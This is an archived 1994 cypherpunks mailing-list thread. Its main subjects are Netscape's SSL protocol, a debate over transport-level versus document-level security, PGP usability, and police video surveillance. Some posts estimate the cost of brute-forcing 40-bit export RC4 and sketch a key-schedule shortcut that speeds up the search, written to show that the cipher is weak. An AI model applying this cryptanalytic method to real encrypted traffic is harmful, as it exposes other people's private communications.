SSL_CK_IDEA_CBC_WITH_MD5 0x05 Gee, I was under the impression that that was CODE, not SPEC. > Not true. Distinguished names can be bulky, but you don't have to > use them that way. What other way could you use? > They can be made to map into DNS names trivially, How? Name a single methodology. > Please define a solution that is: > > distributed > reliable > supports an unforgeable name to public-key mapping > standard > not-bulky > not-expensive > > I will be the first to sign up and buy one. The market exists. Use DNS for key distribution. Use IPSP (soon to be standardized -- SSL isn't standard either) for the packet layer. Use some variant of Photuris for key distribution. All the software in question is publically available or will be and will run on a wide variety of platforms. Perry From perry at imsi.com Mon Dec 12 15:26:43 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 12 Dec 94 15:26:43 PST Subject: oh, and by the way... Message-ID: <9412122326.AA04464@webster.imsi.com> I forgot one element of my proposed alternative to SSL. For securing HTML documents themselves, use something like the new IETF security multiparts standard, which is suitable for protecting MIME encapsulated documents. .pm From kipp at warp.mcom.com Mon Dec 12 15:34:05 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Mon, 12 Dec 94 15:34:05 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121811.AA55359@amanda.dial.intercon.com> Message-ID: <9412121532.ZM17644@warp.mcom.com> On Dec 12, 6:11pm, Amanda Walker wrote: > Subject: Re: Clarification of my remarks about Netscape > [I'm sending this to the list because it does have some crypto content] > > "Kipp E.B. Hickman" writes: > > > There is no need to bypass existing efforts just to add cosmetic value to > > > your own software. > > > This has nothing to do with security... > > Agreed. My annoyance with Netscape is not based solely, or even primarily, > on security concerns. In fact, my only annoyance with your security > proposal is that it is at the wrong layer (or, more accurately, at layer > which should be secondary). In my view, you picked the right technology, > but applied it to the wrong problem :). > > > Clearly I'm an idiot. Explain it to me. > > SSL is a mechanism whereby a client and a server can establish a secure, > authenticated transport channel. The problem is that this isn't what I want > to secure and authenticate. Most of the time, in fact, I don't care about > the transport: I may be talking through a proxy (like the current CERN httpd), > or bringing things in from a cache, or talking to a load-balanced server > array. I want the *documents* I'm accessing to be secure and/or > authenticated. I want my HTML documents signed and certified by the *author*, > not the server. I couldn't care less about the server if I can verify that > I've got the right document in response to my query. Similarly, if I send the > contents of a form containing, say, my Amex number, I want to encrypt the > session key with the public key of the merchant, not the service provider. I believe that these properties of document security are orthogonal to transport security. Today we have bit off transport security. Using MIME multipart encoded documents, document security can be handled as well. There already exist standards defining the format for these (PEM etc.), all that is missing is a browser that adheres to them, and some server based tools for creating them. SSL combined with those provides a powerful solution to todays Internet problems (jeesh, now *I'm* starting to sound like a marketing person :) > This is what I (and many others) mean by an "end to end security model." > Transport security is a nice secondary ability (it helps defend against > traffic analysis, for example, and casual snooping by students with packet > sniffers), but without end-to-end security, it's simply a way of providing a > false sense of security. I wouldn't want to do away with the TCP checksum > field simply because the modem I use for my SLIP link is "error-correcting," > and I feel the same way about security. Agreed. However, today, we consider it a primary concern instead of a secondary concern. To do business on the Internet, people will be filling in forms and submitting data that is sensitive to server operators. We don't want that data to be observered in transit. Data that is paid for should also be private. > > I put my email address in there for that very reason. Jeesh. > > I'd rather that technical feedback occur in a public forum like the IETF. > I have no pretensions about being a security expert, and I want people to > shoot down my bad ideas too. Heck, I *like* having my competitors tell me > what's wrong with my ideas :). I tend to agree here, but before I open something up to wide discussion I prefer to have a smaller group doing the review work. After the small group work has been done, then a larger review follows. > > > This serves as a direct barrier to competition from other commercial > > > vendors. > > > This is an outright lie. We don't use TIPEM. You could build a > > conformant SSL implementation using RSAREF and the freeware IDEA > > cipher code. > > Nope, not if I want to sell it (note the word "commercial" in my comment). > RSAREF cannot be used for commercial software, nor can IDEA under the PGP > license. There is no feasible way to license the RSA patents for commercial > use except by licensing TIPEM. I have been told this outright by Kurt > Stammberger of RSADSI (their VP of marketing, I believe). This is not > secondhand information. All commercial software that I know of using RSA > public key encryption and RSA stream ciphers (such as RC2 and RC4) uses TIPEM > and BSAFE, including Lotus Notes and Apple PowerTalk. RSA's royalty structure > is based on a percentage of revenue, with the percentage on a sliding scale > based on gross corporate revenue (not just on products which use RSA's > patents). If you keep your margins low to compete in the marketplace, you > lose. Even you folks are making your money on high-margin products (servers) > rather than low-margin ones (clients), I'd wager at least in part because it's > a way to make money despite having to pay RSA royalties. I think RSA pulled a fast one on you. We don't use TIPEM. We wrote the X.509 handling code ourselves and have tested it for interoperability. In any case, there are two classes of net consumers out there: the academia and corporation. The academia can almost always get access to source code for free and reuse it interesting manners with little trouble, as long as it's academic. Us business types get stuck paying for everything (of course we make a living that way too...). It doesn't bother me that people would have to license RSA technology to implement SSL commercially. We did, and in some sense it levels the playing field. However, in defense of SSL, I must say that there is no strict requirement for RSA technology. A careful reading of the spec will lead one to discover that different public-key technologies can be used. Since certificates are typed, and standard X.509 certificates include algorithm identifiers, it is possible to implement a different authentication mechanism that doesn't use RSA technology. For example, to choose some popular choices (:^), one could use SHS instead of MD5, skip-jack instead of RC2/RC4/IDEA and some other freely available public key algorithm. > The RSAREF license has been loosened up some recently, but it's still > restricted to freeware. > > > As for a barrier to competition. So what else is new? We > > all have barriers to overcome before we can compete. Should we get rid of > > TCP/IP as a barrier to using the web? > > I don't have to pay royalties to sell an implementation of TCP/IP. Your > analogy fails. My point was that in order to even play on the internet, one needs a computer, a network connection, and TCP/IP, *PLUS* all of the various software that one wishes to use to communicate. This is not free. It is being paid for by you whether you do it directly, or it is built into the margins of the hardware manufaturer that sold you the machine. > > You are somewhat right here. In fact, this was done because we are a company > > interested in surviving long enough to withstand the eventual attack > > by microsoft. > > You've already got your eggs in the right basket on this one--sell servers and > services, not client software. Microsoft has a miserable track record in the > server arena (witness the underwhelming success of Windows NT :)). It's also > less of a commodity market, which is where Microsoft excels (no pun intended). > > > As a result we received critical review > > from some decent members of the crypto community, including: > > > > Martin Abadi > > Mike Burrows > > Alan Schiffman > > Matt Robshaw > > Burt Kaliski > > Mostly RSADSI people, by my count. Great technical background, but I wouldn't > call relying on one of your technology vendors "peer review"... Actually, 2 people from DEC, one from EIT and 2 from RSA. > > As for the IETF standards process, we are pushing the > > document into the RFC process. > > Precisely. Rather than working with others in the industry and research > communities, you are trying to push your proposal into the standards track. I'm listening! What is wrong with SSL? What defects does it have in the way that it tries to solve privacy and authentication? What should we do to make the next version better? -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From skaplin at skypoint.com Mon Dec 12 15:45:52 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Mon, 12 Dec 94 15:45:52 PST Subject: Remailer and gateway list Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Can someone please provide me with a list of all of the current remailers and mail -> usenet gateways? Thanks, Sam ============================================================================== The release of atomic energy has not created a new problem. It has merely made more urgent the necessity of solving an existing one. - Albert Einstein ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLuzfI8lnXxBRSgfNAQEH8wf8CON8wTlCcJPalXWfXMUC4efhG319fISX 8DdRWu7hRJWIbxWQ3kUmqVSk6oGHQv9OuiRR1xJH0x+dcKmdfb7CzJkZ50eX92vI HBCdSE4xfBGWKr/CtLVP3ag8OOcd2dMsZRjG0p0y2oV54fYD70KkUXW6mg1L5xUC eZMpWmi3ZgFZC3xSZREa7nv8TnPkpZBgT7mojFNpwn7vPY29L5Zbb78USSmfR0E0 oNY0JyePxiuMXT4XDHV8XrA/f7fTNtXgGJTZAtHE8ZaU6R10NQBx2AKUnh362X0L RqxHPbgC1Q9ooTkAPPw/4qleceM2j2ZjKbzb5DozCshUdEB88fcNsQ== =z2QT -----END PGP SIGNATURE----- From raph at netcom.com Mon Dec 12 16:01:07 1994 From: raph at netcom.com (Raph Levien) Date: Mon, 12 Dec 94 16:01:07 PST Subject: Time to exhaustively break 40-bit RC4? Message-ID: <199412122330.PAA29185@netcom20.netcom.com> The SSL documents say that exhaustively searching 40 bits of RC4 keyspace takes 64 MIPS-years. When I brought this figure up at the cpunks meeting, it was roundly derided. However, I think it might be a sound estimate. The key schedule operation in RC4 does 256 "swap" operations. Let's say it takes four instructions to do each swap. So, it's 2000 instructions per key. A one-MIPS processor can search 500 keys a second. There are about 30 million seconds in a year, so that's 15 billion keys a year. 40 bits is a trillion keys, so it works out to 66 years, which is well within the Pentium-style accuracy of the calculations I've done. Am I missing something here? On the second floor of Soda Hall are about 100 HP Snake workstatations. I think they're about 100 MIPS each. During the winter break, they will be sitting mostly unused. If the math checks out, they should be able to search keyspace in two and a half days. Anyone wanna do some cracking? Raph From kipp at warp.mcom.com Mon Dec 12 16:02:12 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Mon, 12 Dec 94 16:02:12 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412122322.AA11307@snark.imsi.com> Message-ID: <9412121600.ZM17661@warp.mcom.com> On Dec 12, 6:22pm, Perry E. Metzger wrote: > Subject: Re: Clarification of my remarks about Netscape > > "Kipp E.B. Hickman" says: > > Clearly you and I disagree on a fundamental point. Which is more > > important? Securing the document or securing the transport of the > > document. I believe that today's problem for commerce is securing > > the transport. > > I believe there is a fundamental problem of understanding here -- it > does not seem that you understand how store and forward email > works. Securing just the transport is less than useless. SSL does not provide solutions for the class of problems elucidated by store-and-forward mail systems. However, it does promise that the transmission between two mail agents will be private. Depending on the configuration of your network this may be all you need. Using SSL to "privatize" SMTP transmissions seems useful to me. If the data being transmitted were PEM then all the better. > > Solving this currently widespread problem makes the > > Internet a friendlier place for commerce. It allows sensitive > > information to be transported privately. > > No, it does not -- it just means that some links can't be read. On the > other hand, PEM/MIME-PEM *ALREADY* keep people from reading no matter > whether the link is open or not open. > > > Let's pretend for a moment that you are right. IPSP is the way to > > go, today, and that silly us, we should have used it. So now I go to > > my site manager, and say: > > > > Please replace all that fancy expensive network hardware with new > > ones that speak IPSP so that we can do private communications with... > > You don't have to replace any hardware. More ignorance on your part. Something somewhere has to be able to speak IPSP. Something must be changed, even if it's just software. If it is just software, then I have an upgrade problem because in our network we have one machine from every workstation manufaturer and every kind of PC and MAC imaginable. This is not uncommon, and is a logistics nightmare. Once a service is relegated to only allowing private communications, you are just as stuck as we are. There will be a class of hardware/software that cannot communicate. This upgrade problem exists no matter what security technology is used. > > > So who can I talk to? Name one router that speaks the secure > > protocols you are documenting? > > Each and every one routes it today. I have routed swIPe packets > over the commercial internet -- and of course I couldn't control any > of the intervening routers. Your comments indicate that you are > totally unaware of how IPSP is designed to work. > > You are ignorant and foolish. You could at least read a document or > two before making statements that make you sound stupid. I read your > documents. You could at least read other peoples -- but that would > naturally require that you even realize that other people have done > work on this topic. I believe your tone here is less than helful :-(. You weaken your position by being insulting instead of sticking to the facts. > > > Even were transport layer security needed, there are many other > > > protocols for doing the exact same thing -- your solution is hardly > > > new or interesting. Why not use an existing one instead of rolling Yet > > > Another One? Of course, as I've repeatedly mentioned, network layer > > > security is being used by many people today and will be standardised > > > very soon -- probably before SSL. > > > > We never claimed the solution was new or interesting. However, it is a > > solution. > > Yet Another Solution. Why not invent your own internet protocol? After > all, it would be a "solution". > > > You must have missed a line in the spec: > > > > #define SSL_CK_RC4_WITH_MD5 0x01 > > #define SSL_CK_RC4_EXPORT40_WITH_MD5 0x02 > > #define SSL_CK_RC2_CBC_WITH_MD5 0x03 > > #define SSL_CK_RC2_CBC_EXPORT40_WITH_MD5 0x04 > > #define SSL_CK_IDEA_CBC_WITH_MD5 0x05 > > Gee, I was under the impression that that was CODE, not SPEC. Another helpful response :-( > > Not true. Distinguished names can be bulky, but you don't have to > > use them that way. > > What other way could you use? I would do one of two things: 1. Define a conventional way to use the DN (pick a subset like RFC1485 does). 2. Extend the set of attribute types supported by a DN. > > They can be made to map into DNS names trivially, > > How? Name a single methodology. > > > Please define a solution that is: > > > > distributed > > reliable > > supports an unforgeable name to public-key mapping > > standard > > not-bulky > > not-expensive > > > > I will be the first to sign up and buy one. The market exists. > > Use DNS for key distribution. Use IPSP (soon to be standardized -- SSL > isn't standard either) for the packet layer. Use some variant of > Photuris for key distribution. All the software in question is > publically available or will be and will run on a wide variety of > platforms. Please provide a reference for "Photuris". The web crawler couldn't find it. -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From adam at bwh.harvard.edu Mon Dec 12 16:14:20 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 12 Dec 94 16:14:20 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121532.ZM17644@warp.mcom.com> Message-ID: <199412130014.TAA21734@bwnmr5.bwh.harvard.edu> Kipp E.B. Hickman writes: | I'm listening! What is wrong with SSL? What defects does it have in the way | that it tries to solve privacy and authentication? What should we do to make | the next version better? The first thing you need to do is define a threat model. Make explicit your assumptions. What needs to be trusted, and when? Who are your threats? What are your assets, and what are they worth? Next, you should publish the model, and let us rip it into little shreds. This is hard on the ego, but good for your threat model. No one ever thinks of everything. Iterate here. This is where the time & effort belong. Once you have a solid threat model, you should see what protocols and tools are out there that can be used to defend against those threats. I suspect that most of the tools you will find you need exist. Some will not. Having found what wheels don't need to be invented, you need to code your solutions. Then you need to publish that code to allow the security community to decide whether or not to trust it. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jrochkin at cs.oberlin.edu Mon Dec 12 16:15:08 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 12 Dec 94 16:15:08 PST Subject: extra dashes in PGP-related blocks? Message-ID: At 5:03 PM 12/12/94, Andrew Brown wrote: >but is a remailer (or pgp) smart enough to take the output from checking >a signature and run pgp over it again? is it going to know to take something >and pass it through pgp until pgp can't do anything with it any more? i think >that's the problem that jrochkin was addressing. he has a pgp encrypted >message and then signs it and then wants to mail it to a remailer so that the >remailer can decrypt the message but it won't ecause the encryption is >nested... > >wasn't that it? Well, no, not really. My problem was that a user would send me their public key, inside of a signed message, and the "BEGIN PUBLIC KEY" stuff would have the "- " on it. Which means that before I can add it to my keyring, I've got to edit out the extra "- "s, and then save it in a file, and then pass it through PGP, instead of just passing the original message though PGP, or using the Mac "copy" command on a part of the message and sending that through PGP. Or someone sends me an encrypted address block inside a signed message, and I've got to do the same before I can use it. I now understand why PGP does what it does, but it's still a pain. Perhaps the ideal mail reading program would run my incoming mail through PGP before I even saw it, so I wouldn't have this problem. Well, actually not. My ideal mail reader would check the signatures before I saw them, but would also leave them intact on the message, so I could re-check them myself manually if I wanted. Oh well. It's not a limitation on functionality of any kind, just on convenience. From perry at imsi.com Mon Dec 12 16:32:34 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 12 Dec 94 16:32:34 PST Subject: Time to exhaustively break 40-bit RC4? In-Reply-To: <199412122330.PAA29185@netcom20.netcom.com> Message-ID: <9412130031.AA11399@snark.imsi.com> Raph Levien says: > The SSL documents say that exhaustively searching 40 bits of RC4 > keyspace takes 64 MIPS-years. When I brought this figure up at the > cpunks meeting, it was roundly derided. However, I think it might be a > sound estimate. Its not a question of deriding the estimate... > If the math checks out, they should be able to search keyspace in > two and a half days. ...its a question of deriding the security of any system that takes so little time to crack, and thats assuming there are no better attacks than brute force (yet to be determined). With optimization, you can do even better than that. With a little bit of hardware (not very much) you can crack open a 40 bit keyspace with the effort normally reserved for opening your bathroom door in the morning. Perry From kipp at warp.mcom.com Mon Dec 12 16:33:34 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Mon, 12 Dec 94 16:33:34 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412122118.AA11047@snark.imsi.com> Message-ID: <9412130027.AA17715@warp.mcom.com> In article <199412122229.OAA05451 at jobe.shell.portal.com>, you write: > -----BEGIN PGP SIGNED MESSAGE----- > > "Perry E. Metzger" writes: > > >HTTP, like SMTP, is only a transport for underlying documents. The > >underlying documents are the things people wish to secure, not the > >transport layer. By securing only the transport, you make it possible > >for people to get pages that are forged, although they can be sure of > >what machine delivered them (which isn't significant). Your system is, > >for instance, useless in a proxy HTTP daemon environment. > > I was going to say that an SSL-aware proxy daemon could play "man in > the middle" and pass through the SSL handshaking messages which occur > at connection time, so that the user client could authenticate the > remote server, then communicate using a key shared with that server but > which the proxy would not know. > > But that won't work with SSL, I guess. The SSL handshaking goes on > before any message data has been exchanged; in particular, before the > URL is sent to the proxy to tell it what server to connect to. (Hiding > URL's is one of the features of SSL.) So in fact with SSL the only > authentication possible is between proxy and user, and then between > proxy and remote server. There doesn't seem to be a place in the > protocol where the user could authenticate the remote server and create > a key which would not be known to the proxy. This does seem to be a > deficiency. First, let me clarify slightly. The only place where a problem occurs currently is if the server is attempting to authenticate the client. Because the proxy agent cannot reliably act as an agent for a client, it cannot properly answer a servers authentication requests. I can imagine several solutions to this thorny problem: 1. Client connects securely to a proxy agent using SSL. Upon establishment of the secure connection, the request is transmitted to the proxy. If the request is to a secure document (the proxy can tell by examining the URL) (and the client can tell), then the client re-enters the SSL handshake protocol from the start and the proxy agent turns into a data forwarder ala sockd. This is technically a change to the proxy protocol, but requires no change to the SSL protocol. Of course, to teach proxies about security requires *some* change... 2. The client connects insecurly to a proxy agent using current methods. The client requests a secure document. The proxy agent connects to the secure server using SSL and attempts to act as the client's agent in the transaction. Note that the user must consider this an insecure connection, and trust it only as far as she/he trusts the proxy server. Most of the time, the proxy will work. However, when client authentication is performed, the proxy fails as it should. If one were to construct a "trusted" proxy, then in theory it could perform the client authentication, acting as an agent for the client. However, this seems kinda scary to me, so I can't say I recommend it. To do this would require the client to transmit its authentication information to the proxy agent, which seems like a really bad idea. 3. SSL has a notion of a "security escape" of which there are currently no applications. One could define a security escape to allow enveloping of the authentication information needed by the final server so that the client can properly respond to authentication requests. I haven't thought this thru yet. From db at Tadpole.COM Mon Dec 12 16:34:24 1994 From: db at Tadpole.COM (Doug Barnes) Date: Mon, 12 Dec 94 16:34:24 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121357.ZM17505@warp.mcom.com> Message-ID: <9412130033.AA12133@tadpole.tadpole.com> "Kipp E.B. Hickman" says: > If you would like we can send you some brouchures for our > products in that area. > Ah, it doesn't work with existing proxies, so we have to pay you. Whether it is your true motivation true or not, this apparent attempt to create a market for proprietary goods by disrupting standards is at the core of the bad odor that your company is giving off these days. Not to mention the arrogance: > Secondly, SSL is not an end, but a beginning. Instead of waiting 10 more years > before the standards process gets around to inventing some old technology and > codifying it, we have put something out. We have made the protocol public > instead of propreitary and we have asked for critical review. Not griping. > I'm the first one to agree that even the IETF _can be_ slow and cumbersome. But it is a far cry from typical standards bodies (e.g. ITU, which I've had to deal with recently) in that it is very easy to participate, the standards are freely available, and the process moves fairly rapidly, especially by comparison. If you want to try to answer "what is the Internet?", more than anything else it is a set of _standards_ for doing things in a network of networks. When you declare standards changes by fiat _without even an attempt_ to work with others (formally or informally) you are going to irritate not just your competitors but your potential customer base (which I'm a part of.) As a corporate culture, you folks from Netscape seem to project a sense of arrogance and disregard for the net culture that is extremely irritating. And this is from someone who basically _likes_ your product, and has happy users using it, although I've bumped up the priority of checking out the other commercial offerings in this area because of your arrogance and total disregard for even pro-forma cooperation with the standards process. I'd also like to point out that, more often than not, attempts to create proprietary "standards" by fiat don't work. To wit, look at Microsoft's various attempts at networking. This company has billions, and it ends up announcing, as a great "innovation" that it is (finally) going to support TCP/IP in a meaningful way, despite numerous abortive attempts at other "standards". You point to some other technical areas where frustrated manufacturers split off and extended standards, but I think you'll find in almost every case that it was _after_ they had hit meaningful roadblocks with their proposed standard, and that they worked dilligently to ensure compatability amongst themselves and others offering the new level of technology. Given the history of your company, and the attitudes displayed here, I question whether this will happen with your hacks^H^H^H^H^Hextensions. Doug From kipp at warp.mcom.com Mon Dec 12 16:40:23 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Mon, 12 Dec 94 16:40:23 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412130033.AA12133@tadpole.tadpole.com> Message-ID: <9412121638.ZM17746@warp.mcom.com> On Dec 12, 5:51pm, Doug Barnes wrote: > Subject: Re: Clarification of my remarks about Netscape > > "Kipp E.B. Hickman" says: > > If you would like we can send you some brouchures for our > > products in that area. > > > > Ah, it doesn't work with existing proxies, so we have to pay > you. Whether it is your true motivation true or not, this > apparent attempt to create a market for proprietary goods by > disrupting standards is at the core of the bad odor that your > company is giving off these days. You are right. It doesn't work with existing proxy's. But existing proxy's can't do secure data transfers, so what's your point? > Not to mention the arrogance: > > > Secondly, SSL is not an end, but a beginning. Instead of waiting 10 more years > > before the standards process gets around to inventing some old technology and > > codifying it, we have put something out. We have made the protocol public > > instead of propreitary and we have asked for critical review. Not griping. > > > > I'm the first one to agree that even the IETF _can be_ slow and > cumbersome. But it is a far cry from typical standards bodies > (e.g. ITU, which I've had to deal with recently) in that it is > very easy to participate, the standards are freely available, > and the process moves fairly rapidly, especially by comparison. > > If you want to try to answer "what is the Internet?", more than > anything else it is a set of _standards_ for doing things in > a network of networks. When you declare standards changes by > fiat _without even an attempt_ to work with others (formally > or informally) you are going to irritate not just your competitors > but your potential customer base (which I'm a part of.) > > As a corporate culture, you folks from Netscape seem to project > a sense of arrogance and disregard for the net culture that is > extremely irritating. And this is from someone who basically > _likes_ your product, and has happy users using it, although I've > bumped up the priority of checking out the other commercial > offerings in this area because of your arrogance and total > disregard for even pro-forma cooperation with the standards process. > > I'd also like to point out that, more often than not, attempts > to create proprietary "standards" by fiat don't work. To wit, > look at Microsoft's various attempts at networking. > This company has billions, and it ends up announcing, as a great > "innovation" that it is (finally) going to support TCP/IP in a > meaningful way, despite numerous abortive attempts at other > "standards". > > You point to some other technical areas where frustrated > manufacturers split off and extended standards, but I think > you'll find in almost every case that it was _after_ they > had hit meaningful roadblocks with their proposed standard, > and that they worked dilligently to ensure compatability > amongst themselves and others offering the new level of > technology. Given the history of your company, and the > attitudes displayed here, I question whether this will > happen with your hacks^H^H^H^H^Hextensions. Seems like your mailer was having some difficulty :-) In any case, my personal opinion is that NCOM is being attacked with a catch-22. If we had kept the protocol proprietary, then we would have been shot. We went public with it and are getting shot. If we had waited the 2.5 years to develop it, as a few here would seem to be advocating, then the market would shoot us. Nice place to live. -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From turner at telecheck.com Mon Dec 12 16:45:58 1994 From: turner at telecheck.com (Joe Turner) Date: Mon, 12 Dec 94 16:45:58 PST Subject: Real-time surveillance of the police In-Reply-To: <199412122252.OAA05139@netcom19.netcom.com> Message-ID: <9412130045.AA05949@TeleCheck.com> > I have another point of view to add: I don't want to see my local cops > have all of their actions videotaped and reviewed for quite another > reason--I don't want a "mechanization" of the enforcement process! Its already here. Its a show called COPS. My brother (the black sheep) used to watch it quite a bit before he became one (a cop, not a sheep). More and more police cars here in Texas are becomming equiped with video cameras. Some of the stuff is just unreal, although I prefer the subtle comical tones of one who is under the influence of minde altering subtences. > Forcing the cops to surveill themselves will almost certainly take > away what enforcement discretion they now have. Actually, it usually gives them more credibility in court. I had the pleasure of going to court for a traffic violation to try to plead guilty so they would cut the fine in half at the local court house. What I saw amazed me. I saw person after person trying to defend themselves. They had a police officer referring to his notes, while the government's lawyer quickly won every case. He would ask some simple questions such as, what was the color of the car, etc. and the judge would just fine the defendant guilty. UNTIL, someone came in with his own lawyer. I asked him why he brought a lawyer and he had apparently received a few too many tickets (DUIs) and could loose his license. Anyway, this case started just as the others had. Poor guy, I thought, he's going to loose his license and have to pay this lawyer too. But then just as soon as the officer started to read from his note pad, his lawyer yelled, "OBJECTION! your honor... *please*". To which the judge replied, "your right, " pointed to the officer and told him to put away the notes. After that, he just jumped all over the officer. He went nuts when the officer said he smelled alcohol on his client and even brought in a chemist to testify on the properties of alcohol (which is oderless). To make a long story short, the guy was guilty, but it was thrown out because of the officer. I say this becuase I am tired of hearing about court cases who put the victims on trial rather than the criminals. I would like to see a criminal deny video tape. [ much omited..] Given an effective range of a few miles, your devices must be operating in the 220MHZ + range of freqs (??) and at relatively low power? > (A skier lost in the mountains, a child who has wandered away....all > are cases where the needed bits per second is _much_ less than 1000 > bps. Indeed, most of the localizers are either not sending info at > all, or very sporadically.) Actually, if you've ever gone on a fox hunt with some amateur radio buffs you would quickly find a problem with this. I'm sure on more than one occasion a fox-hunter has driven several miles only to find that the signal he is tracking is being reflected off of a building or lake. Although I do recall that there was talk of a cellular telephone company (in Chicago??) was working on a software modification to do essentially this. I don't know if they are doing it now, but I remember some of the details... the three closest repeaters would triangulate your possition down to the city block. The police were either very interested or very happy with this... I don't remember which... -- Joe N. Turner Telecheck International turner at telecheck.com 5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659 compu$erv: 73301,1654 (800) 888-4922 * (713) 439-6597 From ianf at sydney.sgi.com Mon Dec 12 16:46:00 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Mon, 12 Dec 94 16:46:00 PST Subject: Time to exhaustively break 40-bit RC4? In-Reply-To: <199412122330.PAA29185@netcom20.netcom.com> Message-ID: <9412131131.ZM13269@wiley.sydney.sgi.com> On Dec 12, 3:30pm, Raph Levien wrote: > The key schedule operation in RC4 does 256 "swap" operations. Let's > say it takes four instructions to do each swap. So, it's 2000 > instructions per key. A one-MIPS processor can search 500 keys a > second. There are about 30 million seconds in a year, so that's 15 > billion keys a year. 40 bits is a trillion keys, so it works out to 66 > years, which is well within the Pentium-style accuracy of the > calculations I've done. No, because as you're doing an exhaustive keysearch, you can "pipeline" the key generation process in software. Each key requires 256 swaps, certainly, but there are only two swaps difference between the key for "0000000000" and "0000000001" (assuming a 40 bit key). If you recursively generate keys, then you can generate successive keys like this: 1. Copy the keystate from iteration n-1 (keep the partial keystates on a stack). 2. Do the swap for this portion of the key, and for 255 out of 256 keys, you will have a new one in 2 swaps. (In reality, it would be faster to undo the last swap rather than copying the key, and keeping the swaps on a stack rather than the keystate on a stack. These are implementation issues I haven't given a huge amount of thought to as yet.) Unless there is some hidden complexity which I have overlooked - in which case I will be delighted to stand corrected - this will produce a key fast enough to allow an average workstation to search the 40-bit keyspace using a known plaintext attack in a couple of hours or less. If this is the case, 40-bit RC4 might as well be crypt(1), and 48-bit RC4 looks pretty shakey too. I was planning to code this over the xmas break, dependent on whatever other commitments fall on me during that period. I realised it was possible a couple of months ago after pondering ways of parallelising the RC4 key generation process in hardware. Ian. From andrew at riskdev.ml.com Mon Dec 12 16:59:34 1994 From: andrew at riskdev.ml.com (Andrew Brown) Date: Mon, 12 Dec 94 16:59:34 PST Subject: extra dashes in PGP-related blocks? In-Reply-To: <9412122245.AA17251@hodge-podge.MIT.EDU> Message-ID: <9412130059.AA07996@nottingham.riskdev.ml.com> -----BEGIN PGP SIGNED MESSAGE----- >> From: Jonathan Rochkind > >My problem was that a user would send me their public key, inside of a >signed message, and the "BEGIN PUBLIC KEY" stuff would have the "- " on it. >Which means that before I can add it to my keyring, I've got to edit out >the extra "- "s, and then save it in a file, and then pass it through PGP, >instead of just passing the original message though PGP, or using the Mac >"copy" command on a part of the message and sending that through PGP. >Or someone sends me an encrypted address block inside a signed message, and >I've got to do the same before I can use it. but wait! you can't actually verify the outer sig until you extract the key from inside the signed message? that's a bit more complicated. pgp will actually recognize a key embedded inside an armored, signed message but it won't (i don't think -- warlord?) play with the key other than tell you it is one. what these people should probably be doing is signing their public keys with their private keys to provide the same functionality (almost). what you have, otherwise, really is a two step process. you will have to strip off the outer sig layer to get the the key. >I now understand why PGP does what it does, but it's still a pain. Perhaps >the ideal mail reading program would run my incoming mail through PGP >before I even saw it, so I wouldn't have this problem. Well, actually not. >My ideal mail reader would check the signatures before I saw them, but >would also leave them intact on the message, so I could re-check them >myself manually if I wanted. Oh well. It's not a limitation on >functionality of any kind, just on convenience. i believe if you used emacs to read your mail, you might get that sort of functionality since it's very user-customizable (is that a word?). i wrote myself a little perl wrapper to handle signing/encrypting outbound messages so that i don't have to type all the options and redirect the output or move output files. it's a one person thing. to each his own. i prefer to read my mail in a very un-adulterated form and i do all my sig verifying and decrypting by hand too. i'm weird that way. apologies to warload, you are right (imho) about the fundamental behavior of remailers. they shouldn't do things like that except perhaps atttemp to remove the outer armor layer if it is an encrypting/decrypting remailer. peas and goobles! - -- - --< "CYBERBOY" >-- andrew at ml.com (Andrew Brown) Phone: 1.212.449.0088 Fax: 1.212.449.8612 BATF plutonium AK-47 Kennedy colonel nuclear munitions Legion of Doom smuggle World Trade Center arrangements strategic PLO Rule Psix Ortega -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuzxy7AuBPCxVEQ9AQGylAQAtrcF0ra1aG94Wnac3QFIVL1kmiOsNlGj zCMDAQxXExnBf5UhGct+EkDfO20kZAr2cgYwP5CH3YdcmKJ6J2nk9dvJaujZ2Dhf hPpug+uqnGC7R7V0ZsCcq9onpgYW+9lS4Do+EG1MIfz7j5pg541HBoBVBXOpKRXo nPPB+9OTkLw= =xOk1 -----END PGP SIGNATURE----- From db at Tadpole.COM Mon Dec 12 17:09:02 1994 From: db at Tadpole.COM (Doug Barnes) Date: Mon, 12 Dec 94 17:09:02 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121638.ZM17746@warp.mcom.com> Message-ID: <9412130108.AA12391@tadpole.tadpole.com> > Doug B.: > > > > Ah, it doesn't work with existing proxies, so we have to pay > > you. Whether it is your true motivation true or not, this > > apparent attempt to create a market for proprietary goods by > > disrupting standards is at the core of the bad odor that your > > company is 